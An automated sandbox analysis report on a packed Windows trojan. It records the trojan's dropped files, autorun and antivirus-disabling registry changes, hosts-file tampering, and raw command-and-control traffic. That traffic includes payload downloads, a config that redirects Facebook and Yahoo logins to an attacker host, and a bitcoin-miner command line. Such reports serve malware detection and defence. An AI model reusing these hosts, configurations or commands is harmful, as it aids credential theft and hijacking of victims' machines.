MD5: 0306430436df74471b0a3f2309632415
SHA1: 6bf118b40bc8419d9f94b38142e60e4c4b9e25b5
SHA256: b1741d35878ccb5469ffc30ee659a3ef716ff18b63f824f85dfc8f61778cfdba
SSDeep: 24576:wW79BHGwwIYpXGGHXFRGTTD2jCs16J oVa/d3n3bnSVEYpL:5S9 TvAF/tn/Yh
Size: 838144 bytes
File type: EXE
Platform: WIN32
Entropy: Probably Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-04-07 10:49:58
Analyzed on: WindowsXP SP3 32-bit

Summary:

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

%original file name%.exe:1968
zcwj1w7efz3kqsxdn.exe:2252
zcwj1w7efe89qsxdn.exe:240
zcwj1w7efm80qsxdn.exe:880
alccsjb.exe:3776
zcwj1w7efav5qsxdnln67pfy.exe:2384
pozlrpaqbu.exe:1560
pozlrpaqbu.exe:3076

The Malware injects its code into the following process(es):
No processes have been created.

File activity

The process %original file name%.exe:1968 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\mjbaidfvllkvssl\tst (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\zcwj1w7efav5qsxdnln67pfy.exe (3911 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\zcwj1w7efav5qsxdnln67pfy.exe (0 bytes)

The process zcwj1w7efm80qsxdn.exe:880 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\mjbaidfvllkvssl\tst (10 bytes)

The process alccsjb.exe:3776 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\mjbaidfvllkvssl\tst (10 bytes)

The process zcwj1w7efav5qsxdnln67pfy.exe:2384 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\mjbaidfvllkvssl\etc (10 bytes)
%System%\mjbaidfvllkvssl\tst (10 bytes)
%System%\pozlrpaqbu.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)

The Malware deletes the following file(s):

%System%\drivers\etc\hosts (0 bytes)

The process pozlrpaqbu.exe:1560 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\mjbaidfvllkvssl\tst (10 bytes)

The process pozlrpaqbu.exe:3076 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\mjbaidfvllkvssl\cfg (821 bytes)
%System%\mjbaidfvllkvssl\tst (10 bytes)
%System%\mjbaidfvllkvssl\run (10 bytes)
%System%\win64drkaesent.exe (67687 bytes)
%WinDir%\Temp\zcwj1w7efyx1qsxdn.exe (1940 bytes)
%System%\win64drkclient.exe (68472 bytes)
%System%\mjbaidfvllkvssl\ihst (226 bytes)
%System%\drivers\etc\hosts (904 bytes)
%System%\alccsjb.exe (5873 bytes)
%WinDir%\Temp\zcwj1w7efm80qsxdn.exe (5873 bytes)
%System%\win32drkclient.exe (25340 bytes)
%System%\mjbaidfvllkvssl\por (1 bytes)
%WinDir%\Temp\zcwj1w7efe89qsxdn.exe (35 bytes)
%System%\mjbaidfvllkvssl\rng (192 bytes)
%WinDir%\Temp\zcwj1w7efz3kqsxdn.exe (35 bytes)

The Malware deletes the following file(s):

%WinDir%\Temp\zcwj1w7efe89qsxdn.exe (0 bytes)
%WinDir%\Temp\zcwj1w7efm80qsxdn.exe (0 bytes)
%WinDir%\Temp\zcwj1w7efz3kqsxdn.exe (0 bytes)
%WinDir%\Temp\zcwj1w7efyx1qsxdn.exe (0 bytes)

Registry activity

The process zcwj1w7efz3kqsxdn.exe:2252 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 39 A6 8D ED 2E 3D A3 AC A4 F8 8E 20 6F 88 01"

The process zcwj1w7efe89qsxdn.exe:240 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 FF 6B 77 C8 5C A8 49 EF 29 CF 94 0E 53 1D C3"

The process zcwj1w7efm80qsxdn.exe:880 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 67 37 7B 60 71 56 DE F5 B2 0F 87 A9 D9 0D 20"

The process zcwj1w7efav5qsxdnln67pfy.exe:2384 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "41 84 24 D1 A4 E8 42 E7 BB 7E AF AE 6C D6 F3 A9"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"COM Sharing Registrar CardSpace Detection" = "%System%\pozlrpaqbu.exe"

The process pozlrpaqbu.exe:3076 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 C8 FF 50 02 C0 95 ED 1F 8D 42 65 60 99 C9 79"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The Malware deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

Dropped PE files

HOSTS file anomalies

The Malware modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 804 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://tablefruit.net/forum/search.php?method=validate&mode=sox&v=027&sox=3c0f8605	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=all&flag&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU 3040 @ 1.86GHz (1861 MHz)&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=hostname&host=www.facebook.com&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/dep/win64drkclient.exe	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=checkport&port=23338&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/dep/win32drkclient.exe	98.139.135.198
hxxp://tablefruit.net/dep/win64drkaesent.exe	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=setvar&key=stopped&value=3b93be04&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=post&type=miner_forced&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/forum/search.php?method=all&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/forum/pingtest	98.139.135.198
hxxp://partyorderly.net/dep/win32drkclient.exe	98.139.135.198
hxxp://partyorderly.net/dep/win64drkclient.exe	98.139.135.198
hxxp://partyorderly.net/dep/win64drkaesent.exe	98.139.135.198

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Initial Connection Server Response

Traffic

GET /forum/search.php?method=all&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Tue, 29 Apr 2014 17:00:22 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
ping.5.FLAG cfg.293."jinoplasker.com" "limosebast.com" "uponloud.net" 
"glasshealth.net" "stickmarch.net" "frontride.net" "necessarydress.net
" "wrongthrew.net" "spendmarry.net" "requireneither.net" "gentlefriend
.net" "littleappear.net" "rememberpaint.net" "tablefruit.net" "mightgl
ossary.net" "throughcountry.net" var_user_ip.563.%invite_cc% = "1";.%b
an_contact% = "1";.%live_link% = "hXXp://helpdesk.corp.ebay.com/chat.p
hp?id=4094&sess=7cb9d43961b9887cd63eed7c5ac5f694&talk=1";.ëaylive% =
 "partyorderly.net";.%set_intercepts% = ""VVV.facebook.com" "partyorde
rly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net" 
"/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo
/" "/config/" "0" ";.Þp_host% = "partyorderly.net";.Þp_path% = "/d
ep/";.%no_password% = "0";.%timer% = "480";.%state% = "CA";.%cpuinfo% 
= "Intel(R) Xeon(R) CPU 3040 @ 1.86GHz (1861 MHz)";..............

GET /forum/search.php?method=setvar&key=stopped&value=3b93be04&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Tue, 29 Apr 2014 17:00:17 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 6

Server: YTS/1.20.28
.............

GET /forum/pingtest HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Tue, 29 Apr 2014 17:00:55 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Mon, 14 May 2012 04:16:44 GMT

Accept-Ranges: bytes

Content-Length: 101376

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28
....jj..5j.s.......\F@|.#C>W....H!...4.jR.s5)....#\....F.RW#r....F.
H\.j..-5R.m.).!....F..<#.}..r.KH....\oqR...).....m...6....kr}....f.
\..&.oYl..,......m...6EL}."....u.f.Bo.D..Y...,Q.m..56....Eja.".ef.....
m.YD..,..2.Qm...6.E..."j....f...3.Dm.o....Q....m.6.6q.j.8~.....f..m3..
..c.....m...6..<.qv..8;.f...3........c.Y...%....q.~E8v...;.O......w
.c.;.............v~c.;.........l..w...;[%...?....~..e.c..........wl..;
....[.z..?|....c..}.......%l.......[.....~z.??|.......}.......e...#...
.....?~~^.??........................;~...?~...?xo...s..........wT..;e.
...~..5?....x........|e...p.w_..;....W... .x......5.....|..w...;_....~
x.W?{. .\..O.....|..%...._.......W~}v ?>......O....g....-...o...#~.
..?}.~.>}<O.>......g.....Q........}.xs>....}...>o[g..d.
.[....3.......b.xu&}.:.>....o.O.....[s:..9.....x....u...:..o.qf..8.
[....s...9g...3.u...:........q.<.8q.s..?9..{.g. .3....{....=q..|8.o
..q......g...3.....{m.{.....W....qowD..;].......3....{{s3...R..\.o..p.
wW..;.2..U...*.{..e.s.|..e..\..w...;Wl9...R.U[..*-.s.......\e.-....W.y
..l..U.^;*[...-W=....e......F..u.ly:F...@[^..-....W.r............yu@7.
:..^..-...~W.t3...S......n.u...:@."..m...6....u.t.........G.n..@.|...&
gt;..m...6O.t.....SV..).n..~.....|.im>.v6.a..O0......S...)......|..
F>[email protected].).....M...&n.....x.na...0....o.0.7`x..0l.M...&
..x......B..a.o.0.7....`L.M0&.&..k...>..D......a...0hU`...0LZ..&...
.....k..D5"a...0....hF.L...&ZQ...(.....Dk.X.5.1....h.AN.F GZ....Q...(.
4k.r.5.9.........FA.L. s.Q..E(.....n..r.-.9.q...%A... .{..s....^l.
<<< skipped >>>

POST /forum/search.php?method=post&type=miner_forced&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

Content-Type: application/x-www-form-urlencoded

Content-Length: 131

data=c3Bhd25lZDogJ3dpbjMyZHJrY2xpZW50LmV4ZSAtYSBYMTEgLW8gc3RyYXR1bSt0Y3A6Ly8xMDguMTc0LjE0Ni43ODozMzg4IC11IDNjMGY4NjA1IC1wIHgnDQo=
HTTP/1.0 200 OK

Date: Tue, 29 Apr 2014 17:00:19 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
.............

GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU 3040 @ 1.86GHz (1861 MHz)&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Tue, 29 Apr 2014 16:59:55 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
.............

GET /dep/win64drkaesent.exe HTTP/1.0

Accept: */*

Connection: close

Host: partyorderly.net

HTTP/1.0 200 OK

Date: Tue, 29 Apr 2014 17:00:09 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Mon, 24 Feb 2014 22:08:01 GMT

Accept-Ranges: bytes

Content-Length: 2777088

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..d......S
.................. ..\*[email protected]
 .......*....... .......................................*.......*..$..
..........'...............*..G.......................... .*.(.........
............*[email protected]..... ....... .........
........`.p`.data......... ....... [email protected]...&....!..(
....!.............@.`@.pdata........'.......'[email protected]@.xdata..
......).......(.............@.@@.bss....`b....*.......................
`..edata........*.......)[email protected]@.idata...$....*..&....).....
[email protected].....*.......*.............@[email protected].....*...
....*.............@.`..reloc...G....*..H....*[email protected]........
......................................................................
......................................................................
.............................................ffffff.........H..(1.f.=.
...MZ.._@*.......Q@*.......C@*.......I@*.....tg....)...K@*...tH......e
. .H........( ...;@*.H...`*.H..u`*.H....*.....- ..=..!..tf1.H..(......
... ......Hc.....H..B...H...:PE..u...J.f....t?f......j............]...
......1.......K...f.H...- ...- .1.H..(..zt...,.........1............H.
.8...?*.D...?*.L....).H....).H....).....).H....).H.D$ .c. .....).H..8.
........AUATUWVSH......D...?*.1......H.T$ E..H...H.......eH..%0...1.H.
X.H.=i.*..........H9...'..........H...H...._*.H..u...._*.1........
<<< skipped >>>

GET /dep/win32drkclient.exe HTTP/1.0

Accept: */*

Connection: close

Host: partyorderly.net

HTTP/1.0 200 OK

Date: Tue, 29 Apr 2014 17:00:05 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Sun, 23 Feb 2014 00:22:10 GMT

Accept-Ranges: bytes

Content-Length: 962048

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...9?.S
.................:....... ...........P....@...........................
......W......... .....................................................
....................................................................`.
...........................text....9.......:..................`.``.dat
a........P.......>[email protected]...`...L...F.........
.....@.`@.bss..................................`..idata...............
[email protected][email protected].... ..
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...................................................&......'.......1.f.
[email protected]..$....
.......$.............N..P.N..T.N..4.N.........=dWM..tm1.......&......$
...........f...<.@[email protected][email protected]?f......j...........
.].........1.......K....v...$..L......1......yt...,.........1.........
..f...,. .N..D$...N..D$...N..D$...N....N..$.N...$..N..D$.........N...,
.........'....U1........WV.U.S....|...0.b...)..D$...........@......@..
....@......@......@......@[email protected]..
<<< skipped >>>

GET /forum/search.php?method=checkport&port=23338&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Tue, 29 Apr 2014 17:00:02 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 32

Server: YTS/1.20.28

GET /forum/search.php?method=validate&mode=sox&v=027&sox=3c0f8605 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Tue, 29 Apr 2014 16:59:53 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
304..PhS........tablefruit.net.........8[dOc.E.t?r&..........X..6)].af
/.p.c..............;E..|PG..ot.2.).~...L...m...".........:......[j|"(.
.,....!.Nv8kA.La.whu..........|.w,8...(.~...."....F.VS..,d..7.:.^-...M
.'.<../6~....S0S.Nt<c...I..L.........F..(P..{M..v.........Y...y.
....!.g...\....v...v...tM..q$..W.<.:..f.'.....r..:...4zd...'...._..
...9.......Y[lg5.........L.{..k..........9..........z..._B=.-..,....aX
&.4.....".b..:....sB^.n;.......@>.....i.PR#....'...r!.o.Ho(..8.E...
..k...Bg...m....w|.._.S3.d......1K{.c..Q<.&. n.....'....V.f....;2t.
d...........P..."}...V?U..R....6.c....T.x.......|.}....m...d.W....W...
...PD.....0..S........}.C(....0./...M.|.)'...^|.1.....6.....V V..<.
..G.&.!.....$.g#-..........4..Ks.... ..$4..q..cML.,Y....B.'...Y&.Y-),.
/.....2..a..K.1c.,[email protected].^7 ..|..f.r.{..{...E...
o3X.....F....dg...^.,..z....W@.......$Z.R.y. ..#.z....`....$(.....6...
.!.P..J.p..............s...>....hv.........Wo.[.....Y.K|...A.@.~bd.
.T.6.Mi.|..".m..q....H.L.@..<s....7`....T..>..Q(.;...e ........P
.....B..h..>.\.. [email protected].|.V..........A.....S..%?
...L#...aka........s4..nT....t;.@~..v.We .=........w.,...:.).T...}.tT.
.

GET /forum/search.php?method=all&flag&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Tue, 29 Apr 2014 16:59:54 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
ping.5.FLAG cfg.293."jinoplasker.com" "limosebast.com" "requireneither
.net" "frontride.net" "rememberpaint.net" "uponloud.net" "gentlefriend
.net" "glasshealth.net" "littleappear.net" "stickmarch.net" "throughco
untry.net" "wrongthrew.net" "tablefruit.net" "necessarydress.net" "spe
ndmarry.net" "mightglossary.net" var_user_ip.650.%kill_jhminer% = "1";
.%invite_cc% = "1";.ºn_contact% = "1";.%live_link% = "hXXp://helpdes
k.corp.ebay.com/chat.php?id=4094&sess=7cb9d43961b9887cd63eed7c5ac5f694
&talk=1";.ëaylive% = "partyorderly.net";.%set_intercepts% = ""VVV.fa
cebook.com" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.co
m" "partyorderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "par
tyorderly.net" "/yahoo/" "/config/" "0" ";.Þp_host% = "partyorderly.
net";.Þp_path% = "/dep/";.%no_password% = "0";.%timer% = "480";.%sta
te% = "CA";.%cpuinfo% = "QEMU Virtual CPU version 0.12.5 (2499 MHz)";.
%ip% = "86.35.223.12";.%relay_soxid% = "3b93be04";.%port% = "22271";.p
lugin.55070.miner_forced.80.win32drkclient.exe -a X11 -o stratum tcp:/
/108.174.146.78:3388 -u 3c0f8605 -p x.MZ......................@.......
........................................!..L.!This program cannot be r
un in DOS mode....$.........lg...4...4...4.?y4...4...4...49..4...4...4
...4...4...4...4...4...4...4Rich...4................PE..L.....\S......
...............N....................@.................................
............................................(.........................
..............................................@...............(...
<<< skipped >>>

GET /forum/search.php?method=all&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Tue, 29 Apr 2014 17:00:29 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
.............

GET /dep/win64drkclient.exe HTTP/1.0

Accept: */*

Connection: close

Host: partyorderly.net

HTTP/1.0 200 OK

Date: Tue, 29 Apr 2014 16:59:56 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Fri, 21 Feb 2014 20:25:42 GMT

Accept-Ranges: bytes

Content-Length: 2785792

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..d...K..S
.................. ..~*..V............@..............................@
 .....M/ ....... .......................................*.......*..$..
..........(...............*.8I.......................... .*.(.........
............*[email protected]..... ....... .........
........`.p`.data...`..... ....... [email protected]`....!..b
....!.............@.`@.pdata........(.......'[email protected]@.xdata..
<....0).......).............@.@@.bss.....U...0*....................
...`..edata........*.......)[email protected]@.idata...$....*..&....*..
[email protected].....*......4*.............@[email protected].....*
......6*.............@.`..reloc..8I....*..J...8*[email protected].....
......................................................................
......................................................................
................................................ffffff.........H..(1.f
.=....MZ...Z*........Z*........Z*........Z*.....tg....*....Z*...tH....
..uw .H......... ....Z*.H...s*.H...s*.H....*...... ..=(.!..tf1.H..(...
....-w ......Hc.....H..B...H...:PE..u...J.f....t?f......j............]
.........1.......K...f.H.... .... .1.H..(..zt...,.........1...........
.H..8..&Z*.D../Z*.L....*.H....*.H....*.....*.H....*.H.D$ .sv .....*.H.
.8.........AUATUWVSH......D...Y*.1......H.T$ E..H...H.......eH..%0...1
.H.X.H.=i.*..........H9...'..........H...H....r*.H..u....r*.1.....
<<< skipped >>>

GET /forum/search.php?method=hostname&host=VVV.facebook.com&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Tue, 29 Apr 2014 16:59:56 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
..........................

.text

`.rdata

@.data

SSSSSh

.pHUf

\$HSSSh

~3SSSh0

SSShPbC

SSShP

toSSShPbC

t}SSSh

u3SSShP

tBSSSh 'E

SSSh 'E

~
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
GetProcessHeap
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
pozlrpaqbu.exe
qsxdn.exe
alccsjb.exe
Ca.Dq ~
.hh#HD
0mw%fV
JW%%Cp3F
e.aQ{
%uKJ}W
;ÅM
-)*%u
"B.gX1
zcÁ
%Documents and Settings%\LocalService
|%System%\alccsjb.exe
|tablefruit.net
WATCHDOGPROC "c:\windows\system32\pozlrpaqbu.exe"
%System%\pozlrpaqbu.exe
mscoree.dll
KERNEL32.DLL

alccsjb.exe_3776:


.text
